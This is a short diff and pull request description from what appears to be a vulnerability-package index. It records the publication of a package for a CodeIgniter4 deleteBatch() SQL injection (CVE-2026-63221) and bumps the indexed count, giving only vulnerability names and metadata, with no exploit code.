 | [CVE&#8209;2025&#8209;59060](CVE-2025-59060/) | **Apache Ranger**<br>Apache Ranger TLS Hostname Verification Bypass | **N/A** |
 
-23 of the 119 indexed packages record a bypass or incomplete-fix finding.
+23 of the 120 indexed packages record a bypass or incomplete-fix finding.
 
 ## Typical package layout
 


### PR DESCRIPTION
Pipeline-staged publish package for CVE-2026-63221.

- CodeIgniter4 Query Builder `deleteBatch()` — CodeIgniter4 deleteBatch() SQL Injection
- CVSS 9.4; bypass: no
- Audit: exit contract + package sweep clean at publish time

Published via the pipeline UI publish gate.